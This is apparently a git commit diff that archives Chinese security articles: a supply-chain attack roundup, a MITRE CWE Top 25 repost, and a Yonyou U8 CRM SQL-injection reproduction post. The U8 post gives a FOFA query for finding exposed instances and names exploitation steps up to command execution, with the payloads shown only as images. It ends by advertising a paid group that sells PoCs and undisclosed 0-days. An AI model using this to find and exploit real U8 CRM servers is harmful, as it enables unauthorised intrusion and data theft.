漏洞预警 | 懂微百择唯·供应链SQL注入漏洞、美国Verizon、AT&T电信网络攻击案疑似内鬼kiberphant0m?此人声称获取了特朗普和哈里斯的通话记录、小米电动滑板车漏洞或致电子木马攻击:电池供电嵌入式系统上的勒索软件、跟踪、DoS和数据泄露问题研究、2024年软件供应链安全挑战迈入新阶段!、【神兵利器】JAVA JMX漏洞利用工具、【大量存在】用友U8C ajaxgetborrowdata存在SQL注入漏洞、MITRE公布最危险软件漏洞TOP25榜单、【漏洞情报】快排查!开源分享功能域名遭灰黑产抢注,用作黑帽SEO、

This commit is contained in:
test 2024-11-28 00:53:34 +00:00
parent 056aa65bb7
commit eb29cf5ae2
9 changed files with 954 additions and 24 deletions

View File

@ -662,5 +662,13 @@
"https://mp.weixin.qq.com/s?__biz=MzIyNzc3OTMzNw==&mid=2247485594&idx=1&sn=f07916b48ea1a7d4826a562a9f983b1b": "【工具分享】某 FE 平台一键漏洞探测工具", "https://mp.weixin.qq.com/s?__biz=MzIyNzc3OTMzNw==&mid=2247485594&idx=1&sn=f07916b48ea1a7d4826a562a9f983b1b": "【工具分享】某 FE 平台一键漏洞探测工具",
"https://mp.weixin.qq.com/s?__biz=MzI3NzI4OTkyNw==&mid=2247489519&idx=1&sn=b939e5dc74d7454cca83e688b2f45a4d": "【漏洞情报】快排查开源分享功能域名遭灰黑产抢注用作黑帽SEO", "https://mp.weixin.qq.com/s?__biz=MzI3NzI4OTkyNw==&mid=2247489519&idx=1&sn=b939e5dc74d7454cca83e688b2f45a4d": "【漏洞情报】快排查开源分享功能域名遭灰黑产抢注用作黑帽SEO",
"https://mp.weixin.qq.com/s?__biz=MzkyOTcwOTMwMQ==&mid=2247484561&idx=1&sn=8cb121fd6b70d997bb2172fba8850978": "多款AC集中管理平台未授权漏洞【漏洞复现|附nuclei-POC】", "https://mp.weixin.qq.com/s?__biz=MzkyOTcwOTMwMQ==&mid=2247484561&idx=1&sn=8cb121fd6b70d997bb2172fba8850978": "多款AC集中管理平台未授权漏洞【漏洞复现|附nuclei-POC】",
"https://mp.weixin.qq.com/s?__biz=Mzk0ODM0NDIxNQ==&mid=2247492810&idx=1&sn=389a83e0263bfc916ef686658d7b17e3": "James_synthesis_tooL | 日常渗透测试或攻防演练中对于漏洞及指纹的积累工具" "https://mp.weixin.qq.com/s?__biz=Mzk0ODM0NDIxNQ==&mid=2247492810&idx=1&sn=389a83e0263bfc916ef686658d7b17e3": "James_synthesis_tooL | 日常渗透测试或攻防演练中对于漏洞及指纹的积累工具",
"https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491570&idx=2&sn=1353e926154547a4132feb4a8afb1bd0": "漏洞预警 | 懂微百择唯·供应链SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkyMjQ5ODk5OA==&mid=2247505583&idx=1&sn=3005e31a4684af8891cef2abef768833": "美国Verizon、AT&T电信网络攻击案疑似内鬼kiberphant0m此人声称获取了特朗普和哈里斯的通话记录",
"https://mp.weixin.qq.com/s?__biz=MzkyMjQ5ODk5OA==&mid=2247505583&idx=2&sn=6ea0b2ec70e958d252246bd0abf6be4e": "小米电动滑板车漏洞或致电子木马攻击电池供电嵌入式系统上的勒索软件、跟踪、DoS和数据泄露问题研究",
"https://mp.weixin.qq.com/s?__biz=Mzg4MjQ4MjM4OA==&mid=2247522279&idx=1&sn=9ffc60ebfdd7792c6353624adbf4b0ec": "2024年软件供应链安全挑战迈入新阶段",
"https://mp.weixin.qq.com/s?__biz=Mzg4MTU4NTc2Nw==&mid=2247493697&idx=1&sn=5e927967f0126a4b20bcf610135bf63c": "【神兵利器】JAVA JMX漏洞利用工具",
"https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488646&idx=2&sn=c2dfaf5ba31c7d478865e3dddd31b72a": "【大量存在】用友U8C ajaxgetborrowdata存在SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247534800&idx=3&sn=cc02fd4232b68f295133224584d8cd6f": "MITRE公布最危险软件漏洞TOP25榜单",
"https://mp.weixin.qq.com/s?__biz=Mzg5NjU3NzE3OQ==&mid=2247490236&idx=1&sn=2467e77baf0e3b560ef57a7725560439": "【漏洞情报】快排查开源分享功能域名遭灰黑产抢注用作黑帽SEO"
} }

View File

@ -0,0 +1,81 @@
# 2024年软件供应链安全挑战迈入新阶段
网安加社区 2024-11-27 23:03
![](https://mmbiz.qpic.cn/mmbiz_gif/nmic4AsdMAVYa31awNqib0Zlibby9icR9TkIibdG3CqHYQcSCUeslYXk4yfPLHEU3j7gkDRe6kQHrtS9MMvPu9faKjQ/640?wx_fmt=gif "")
2024年10月供应链安全领域遭遇了前所未有的挑战迈入了一个以创新攻击技术和加密货币为核心威胁的新阶段。本月发生了一系列的震撼性事件
如一种影响多个包生态系统的新型入口点利用技术被曝光NPM生态系统首次遭遇了以太坊智能合约被恶意利用于构建C2命令与控制基础设施多起通过PyPI包对加密货币钱包的复杂攻击事件相继爆发等等...
这些事件不仅揭示了供应链攻击手段持续进化与高度复杂化的趋势,更是警示了全球软件开发者和企业正面临日益严峻且多变的安全威胁现实。
**下面让我们深入了解10月发生的这些事件**
****
**1.新型供应链攻击技术CLI命令木马化**
这种全新的供应链攻击技术利用不同编程生态系统中的入口点对CLI命令进行木马化。这种隐蔽手法能够轻易绕过传统的安全检查机制对开发者和企业构成了极大的威胁。
**2.lottie-player包遭攻陷2FA防线失效**
尽管启用了双重认证2FA作为安全防线但NPM包lottie-player仍因泄露的自动化令牌而被攻击者成功接管。攻击者在恶意版本中注入了代码诱导用户连接加密钱包从而实施窃取行为。
**3.加密货币窃取代码潜藏在Python包依赖项中**
一次针对PyPI的复杂网络攻击利用恶意软件包针对加密货币钱包进行了定向攻击。攻击者采取欺诈手段在依赖项中隐秘植入恶意代码这些代码仅在调用特定函数时才被激活极大地增加了检测的难度。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/nmic4AsdMAVaeP5ZbSR9Odp21TekXEsyyYLPT2c04bZeaQlhBArWWnW9W3a4ibfUzC60xRLoIsEmRERYfShzVBEg/640?wx_fmt=png&from=appmsg "")
**4.多向量供应链攻击瞄准加密货币爱好者**
一个名为“cryptoaitools”的恶意PyPI包通过多向量供应链攻击将目标锁定在加密货币爱好者身上。该恶意包利用欺骗性的图形用户界面GUI、多阶段感染和全面的数据泄露手段从Windows和macOS用户那里窃取与加密货币相关的信息。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/nmic4AsdMAVaeP5ZbSR9Odp21TekXEsyy3Tg6gMWc7ts9JhOxrO1l23icOJdYmm9rmuQP6ZoIQKdzJ7DfCO0XF9Q/640?wx_fmt=png&from=appmsg "")
**5.利用以太坊智能合约分发跨平台恶意软件**
一次复杂的NPM供应链攻击利用以太坊智能合约进行C2分发。这款跨平台恶意软件针对流行的测试包通过拼写钓鱼Typosquatting
策略和预安装脚本对Windows、Linux和macOS系统均构成了威胁。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/nmic4AsdMAVaeP5ZbSR9Odp21TekXEsyyPGRQjtEria6NA9FD9lo2dTUbDUXbbViblrHpDiatDTSmXic0mA42jbcRKA/640?wx_fmt=png&from=appmsg "")
当前,创新的攻击技术与针对加密货币的威胁交织在一起,使得供应链安全的形势愈发严峻。面对这些日益复杂的威胁,我们必须时刻保持警惕,加强安全防护措施,不断提升自身的安全意识和能力,以应对这些新的挑战。
文章来源https://checkmarx.com/blog/october-2024-in-software-supply-chain-security/
,本文由网安加社区编译。
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/nmic4AsdMAVbjcIJdE8iciaKnCLhib4LwQcHDQsw7mMvP4XHj10MdHt7Yu8la4v8ltjUfCpn2jqbrR9oKWXWLsVJ1w/640?wx_fmt=gif&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**专家群聊**
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/nmic4AsdMAVZan2xGMKPLYUbAQC2ZXVBBflB74bXtEohzsf1WNQ7e9qhlP68lq98PSxgd3gPVwvGs4dXf3aDx2A/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "undefined")
扫码添加安仔微信,邀请进群
与行业专家深入交流探讨~
**· 往期推荐 ·**
1. [卡巴斯基2025年高级持续性威胁APT趋势预测](https://mp.weixin.qq.com/s?__biz=Mzg4MjQ4MjM4OA==&mid=2247522254&idx=1&sn=1bfdaa1a67d4076e2f89cbc643300a5c&scene=21#wechat_redirect)
2. [医疗行业安全困境AI并非“万能解药”](https://mp.weixin.qq.com/s?__biz=Mzg4MjQ4MjM4OA==&mid=2247521342&idx=1&sn=d799e819fa530c86adab6cd57f97afd6&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/nmic4AsdMAVa8ichJWxZXwOeEibWSUibnn7s5IibKwr76wzB1xJGdDap8r0ibGRzPuiaPAWDQ6Jtlhibmicbp45pt2JNPmw/640?wx_fmt=gif&from=appmsg "")

View File

@ -1,9 +1,20 @@
# MITRE公布最危险软件漏洞TOP25榜单 # MITRE公布最危险软件漏洞TOP25榜单
GoUpSec 2024-11-22 02:17 安小圈 2024-11-27 00:45
![](https://mmbiz.qpic.cn/sz_mmbiz_png/INYsicz2qhvZV4A6ljINY7aQ2znae0ibPugkFX6uMyo3kHd8pibeO8OibaXx5hpKlH9AON92TfOKfgaYJKFslVbkRw/640?wx_fmt=png&from=appmsg "") **安小圈**
第554期
**【高危漏洞】TOP25**
****
 
![](https://mmbiz.qpic.cn/sz_mmbiz_png/INYsicz2qhvZV4A6ljINY7aQ2znae0ibPugkFX6uMyo3kHd8pibeO8OibaXx5hpKlH9AON92TfOKfgaYJKFslVbkRw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_png/BWicoRISLtbNppYecAVILE9qW0hriaRLRpfAqj3pZlEZPganMTTvabD75ACI4xLOVX3XDpbecicAXsuvC3Y5Gt6xg/640?wx_fmt=png "")
在快速变化的网络威胁环境中漏洞始终是网络攻击的主要切入点。近日美国网络安全组织MITRE更新了2024年CWE Top 25最危险软件漏洞榜单汇总了2024年全球最常见、最具影响力的软件漏洞为企业、开发者和安全研究人员提供重要参考。 在快速变化的网络威胁环境中漏洞始终是网络攻击的主要切入点。近日美国网络安全组织MITRE更新了2024年CWE Top 25最危险软件漏洞榜单汇总了2024年全球最常见、最具影响力的软件漏洞为企业、开发者和安全研究人员提供重要参考。
@ -16,7 +27,7 @@ CWECommon Weakness Enumeration公共弱点枚举是一种标准化的
2024年CWE Top 25完整列表 2024年CWE Top 25完整列表
![](https://mmbiz.qpic.cn/sz_mmbiz_png/INYsicz2qhvZV4A6ljINY7aQ2znae0ibPuZMlVQS0nUgRicc76BA4e3XgB42UJPKw79oKzmKiawibCMG8hViaYZyoPtw/640?wx_fmt=png&from=appmsg "") ![](https://mmbiz.qpic.cn/sz_mmbiz_png/INYsicz2qhvZV4A6ljINY7aQ2znae0ibPuZMlVQS0nUgRicc76BA4e3XgB42UJPKw79oKzmKiawibCMG8hViaYZyoPtw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**2024年榜单亮点** **2024年榜单亮点**
@ -74,33 +85,80 @@ SQL注入漏洞多年来居高不下攻击者可通过未加验证的输入
- 供应链安全:确保外包和第三方软件符合安全标准。 - 供应链安全:确保外包和第三方软件符合安全标准。
参考链接: **参考链接:**
https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/INYsicz2qhvZRDUnojiaba5EGXQ7vEkEX8iar6wfVEW8pJj4v4XBgG48Lt1Ga5seakLRcfZJdGmq4yUsZXdLh2ZfA/640?wx_fmt=jpeg "") ![](https://mmbiz.qpic.cn/mmbiz_png/BWicoRISLtbMSrNYPzeZSs4X316kGV7UeOsnl5ayrQXc0wPVutL1dQXg7BugT7vAe8qkpfszTrlhUAq4DQZFaVA/640?wx_fmt=png "")
**【原文来源GoUpSec****】**
![](https://mmbiz.qpic.cn/mmbiz_jpg/BWicoRISLtbPXIp0CHOLWHoJQicJ7onhDaPpvpCqLkza5ZoKgezBOz9dGV8oAYghuD3z2uNWOey0MmkHaDzpIkTA/640?wx_fmt=jpeg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/0YKrGhCM6DbI5sicoDspb3HUwMHQe6dGezfswja0iaLicSyzCoK5KITRFqkPyKJibbhkNOlZ3VpQVxZJcfKQvwqNLg/640?wx_fmt=gif "")
END [](https://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247534654&idx=1&sn=3851c5763d55754347dcd7eaed4862f5&scene=21#wechat_redirect)
- [  预警!针对我国用户的“银狐”木马病毒出现新变种  ](https://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247534654&idx=1&sn=3851c5763d55754347dcd7eaed4862f5&scene=21#wechat_redirect)
#
- # Windows 0-Day 漏洞-(CVSS 9.8) CVE-2024-43491
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247528131&idx=1&sn=ee17bfc91d1275e5a25a8ac88e775324&chksm=ce22397bf955b06dbab2cbeebf6a2f9ba2bb2e364f2651879c3b66d93a4cc9265c12c0cd0197&scene=21#wechat_redirect)
- [腾讯【微信】存在可能导致远程代码执行【漏洞】](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247528131&idx=1&sn=ee17bfc91d1275e5a25a8ac88e775324&chksm=ce22397bf955b06dbab2cbeebf6a2f9ba2bb2e364f2651879c3b66d93a4cc9265c12c0cd0197&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247525096&idx=2&sn=d1467825e0d943445aa7437f8fa9916c&chksm=ce223550f955bc4687eab62af06027a266a6c7fd068413e62e7ca85aa51fa28bc16075b37201&scene=21#wechat_redirect)
- [CVE-2024-72629.3WPS【漏洞】已经被武器化](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247525096&idx=2&sn=d1467825e0d943445aa7437f8fa9916c&chksm=ce223550f955bc4687eab62af06027a266a6c7fd068413e62e7ca85aa51fa28bc16075b37201&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524771&idx=1&sn=fb1d9a27c4e29c56ccd88a5f981b2d8f&chksm=ce22361bf955bf0d27a75c950d19d6cbfcdf4b5796b9341aaa6551dc56cf046b2426a3c861ff&scene=21#wechat_redirect)
- [微软披露Office最新【零日漏洞】可能导致数据泄露](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524771&idx=1&sn=fb1d9a27c4e29c56ccd88a5f981b2d8f&chksm=ce22361bf955bf0d27a75c950d19d6cbfcdf4b5796b9341aaa6551dc56cf046b2426a3c861ff&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524688&idx=1&sn=86e599b109e7188ccf652be2fd32b30b&chksm=ce2236e8f955bffef66fa55c274018570ce65982369f4760cb1a5250bbd8f7692b86b0a8222b&scene=21#wechat_redirect)
- [【微软警告】OpenVPN存在【漏洞】| 可能存在漏洞链](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524688&idx=1&sn=86e599b109e7188ccf652be2fd32b30b&chksm=ce2236e8f955bffef66fa55c274018570ce65982369f4760cb1a5250bbd8f7692b86b0a8222b&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524560&idx=1&sn=0ef4d3371f0d6374894ad5259e45ac63&chksm=ce223768f955be7e49bfe14375d3fb22a0718b0474ca42dbafe5c21c15047f40a57e8c82abf7&scene=21#wechat_redirect)
- [【爆】堪比Windows蓝屏危机| Linux被曝12年史诗级漏洞“投毒者”是谷歌](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524560&idx=1&sn=0ef4d3371f0d6374894ad5259e45ac63&chksm=ce223768f955be7e49bfe14375d3fb22a0718b0474ca42dbafe5c21c15047f40a57e8c82abf7&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524560&idx=1&sn=0ef4d3371f0d6374894ad5259e45ac63&chksm=ce223768f955be7e49bfe14375d3fb22a0718b0474ca42dbafe5c21c15047f40a57e8c82abf7&scene=21#wechat_redirect)
- [0.0.0.0 Day【漏洞】曝光 | 谷歌、Safari、火狐等主流浏览器面临威胁](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524229&idx=1&sn=46ad42b4a0f5f4d8a0cce1552ba62b7f&chksm=ce22c83df955412b3e8501a9ac056c1330bc269026a2366fedc91e8a5a5bd083ad650fe0eed9&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524025&idx=1&sn=d71c239f2b207cc5d31dd2ff74bf9ce2&chksm=ce22c901f95540172b025e9306778f4066cde3c6150400af01fe22a3e693845263944eefb4d6&scene=21#wechat_redirect)
- [核弹级【漏洞预警】Windows 远程桌面 | 授权服务远程代码执行漏洞(CVE-2024-38077)](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247524025&idx=1&sn=d71c239f2b207cc5d31dd2ff74bf9ce2&chksm=ce22c901f95540172b025e9306778f4066cde3c6150400af01fe22a3e693845263944eefb4d6&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247520585&idx=1&sn=35cdaeef004b4615fb052326c8594c26&chksm=ce22c6f1f9554fe705c05a9534506a615cb539c264dd5a12cbbe7cedd831507503cd65936826&scene=21#wechat_redirect)
- # 【0 day】阿里 NACOS 远程命令执行漏洞
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247520860&idx=1&sn=0b6114b76495de68dba79b87b520da16&chksm=ce22c5e4f9554cf2ae8ff183dcb6d7249d8ea9fb4244f5b1d8b9950b3d8035faf8e45ef2a03a&scene=21#wechat_redirect)
- # 【盘点】最严重的39个硬件安全漏洞
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247519816&idx=1&sn=74414bf876b016b3efafca086603e4dd&chksm=ce22d9f0f95550e6234cffca5e7008763bf538a48deb8fd6e500060c7364075ea9975ab9a90f&scene=21#wechat_redirect)
- # 如何防护0-day漏洞攻击
#
- # 【风险提示】OpenSSH 远程代码执行漏洞CVE-2024-6387
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247519305&idx=1&sn=7611fef93e007338b538c92d84cb717a&chksm=ce22dbf1f95552e76ab3441d0d4364fc1cb55ec1b199919ad13735577fc2f1e0e6d9cb34a75b&scene=21#wechat_redirect)
- # 【漏洞预警】Apache HTTP Server 信息泄露漏洞
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247517435&idx=2&sn=f886ee4cac082229881224ea2f978c07&chksm=ce22d343f9555a556633469c8cf9a18ed91f34ea3c04f90939b9c9a120385f6e724990b5fa4d&scene=21#wechat_redirect)
- # 红队视角2024 | 国家级攻防演练100+必修高危漏洞合集(可下载)
#
- # 【干货】2024 攻防演练 · 期间 | 需关注的高危漏洞清单
相关阅读 ![](https://mmbiz.qpic.cn/mmbiz_gif/BWicoRISLtbP7Bh21K85KEkXX7ibWmLdM2eafpPicoTqk37LEVMUKD1JuAic4FF4KB7jP4oFTricyMwvj5VUZZ824ww/640?wx_fmt=gif "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/BWicoRISLtbNzlia8CP45sjgLJgia5Y22hx8khBeShnAzCPwsfqeIVKkpFDhUoMUWMicq6toR2TSUmgBpgzZQHEAHw/640?wx_fmt=jpeg "")
![](https://mmbiz.qpic.cn/mmbiz_png/BWicoRISLtbPFKyibwduMibC35MsIhibgZEAibwSyVRz7FKt3xa1UK61fXXCCUKllCXFrLdnBqcmgiaKeSxGrWT0RtYw/640?wx_fmt=png "")
[立即修复五眼联盟公布最常被利用的15个漏洞名单](http://mp.weixin.qq.com/s?__biz=MzkxNTI2MTI1NA==&mid=2247501433&idx=2&sn=26dab7b46c410a8e7d56e6b78f742e15&chksm=c1635450f614dd4629ffa42519719c18040914459c22a0b633bb994bc6fc515b55cfded5094c&scene=21#wechat_redirect)
[25家跨国企业数据泄露MOVEit漏洞引发重大安全危机](http://mp.weixin.qq.com/s?__biz=MzkxNTI2MTI1NA==&mid=2247501422&idx=1&sn=312c9acb659009fdafc7e2bd665d45ad&chksm=c1635447f614dd51e15089e454de47c39f1da09e891b98ed7d58636f88a32c83adeb095d6407&scene=21#wechat_redirect)
[重大突破AI首次发现内存安全漏洞](http://mp.weixin.qq.com/s?__biz=MzkxNTI2MTI1NA==&mid=2247501362&idx=1&sn=11733a657772038607843a4e8ce5c2be&chksm=c163541bf614dd0de8e640e673f20c0483f088326c33991644b14db08cc7a015743368eb3017&scene=21#wechat_redirect)
[苹果悬赏百万美元查找“苹果智能”安全漏洞](http://mp.weixin.qq.com/s?__biz=MzkxNTI2MTI1NA==&mid=2247501306&idx=2&sn=dfc7bfbf8b2f34c58acf4194e027c242&chksm=c16357d3f614dec5edd68a238ade4dde66ebe63ddf160a9e2247e8749fbeff5c1609c0f3fe2d&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_jpg/INYsicz2qhvbgcN4QY36lK2wjCavZiadQThpmM11FR4xkwyVG7K24lkpoLRcFHuZ7gAHgZEsr6Mia7BmKuwDJqX4g/640?wx_fmt=jpeg "")

View File

@ -0,0 +1,155 @@
# 【大量存在】用友U8C ajaxgetborrowdata存在SQL注入漏洞
xiachuchunmo 银遁安全团队 2024-11-27 22:01
**需要EDU SRC邀请码的师傅可以私聊后台免费赠送EDU SRC邀请码邀请码管够**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**漏洞简介**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
******用友crm客户关系管理的第一需求就是对客户信息的集中管理和共享利用即客户资源的企业化管理避免因业务调整或人员变动造成的客户资源流失和客户管理盲区的产生更重要是可以通过完善的客户信息来支持不同业务角色面向客户的工作实现客户信息在企业内部充分共享利用提高面向客户的工作有效性和效率从而全面提升客户的满意度。用友U8-CRM ajaxgetborrowdata存在SQL注入漏洞**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**资产测绘**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
```
title="用友U8CRM"
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibvkW4kOOKEsgsWAVmfnvfMzfWgXwJHu5oKv6ORJKLIIDFeVkB6sjHLpLiaUh6xobH9mT14dOI5eGQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**漏洞复现**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**延时注入测试**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibvkW4kOOKEsgsWAVmfnvfMHckLNuENp5tibGWdQIKvq8jPYYZTkOrAHt7m5e1wAHOoLIolgeDvovg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**SQLMap测试**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibvkW4kOOKEsgsWAVmfnvfM7Rsz1iaZ8IYSyy88Xiaos2hI8CTh6YICv08tCN1dHa368x26pr9oTmFw/640?wx_fmt=png&from=appmsg "")
**获取当前数据库名测试**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibvkW4kOOKEsgsWAVmfnvfMoYO1w3YXibxA2fe3t4WcgBSSsboia9VM7J10zYmDvCD0CBYKRd2URd3g/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**命令执行测试**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibvkW4kOOKEsgsWAVmfnvfMTfkzicMu3FOicRhYI5ibPwnGOGZAZpokvA3JsvhUVEQ8cSjdQukAxk8Hw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**Nuclei测试**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibvkW4kOOKEsgsWAVmfnvfMZp1gGiaCytvpZWia4kwNde3icXBFVLN7JSvTM0zCJ06C5O1ajqYtWXVSw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**圈子介绍**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
质量漏洞利用工具分享社区每天至少更新一个0Day/Nday/1day及对应漏洞的批量利用工具团队内部POC分享星球不定时更新内外网攻防渗透技巧以及最新学习研究成果等。
如果师傅还是新手内部的交流群有很多行业老师傅可以为你解答学习上的疑惑内部分享的POC可以助你在Edu和补天等平台获得一定的排名。
如果师傅已经
是老手了有一个高质量的LD库也能为你的工作提高极大的效率实战或者攻防中有需要的Day我们也可以通过自己的途径帮你去寻找。
**【圈子服务】**
1一年至少365+漏洞Poc及对应漏洞批量利用工具
2Fofa永久高级会员
324HVV内推途径
4Cmd5解密各种漏洞利用工具及后续更新渗透工具、文档资源分享
5内部漏洞
库情报分享
目前已有2000+
poc会定期更新包括部分未公开0/1day
6加入内部微信群认识更多的行业朋友群里有100+C**D通用证书师傅遇到任何技术问题都可以进行快速提问、讨论交流
圈子目前价格为**129元**
**(交个朋友啦!)**
现在星球有近900+位师傅相信并选择加入我们人数满1000
**涨价至149**,圈子每天都会更新内容。
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/yeJvia5dNx5ibmJXuUnaww610JyW2aMD7XyghxoOEL12QTuKPMtygJ7abCibjickyRUpBPDf52hoXPRu3nWEmjzt5A/640?wx_fmt=jpeg&from=appmsg "")
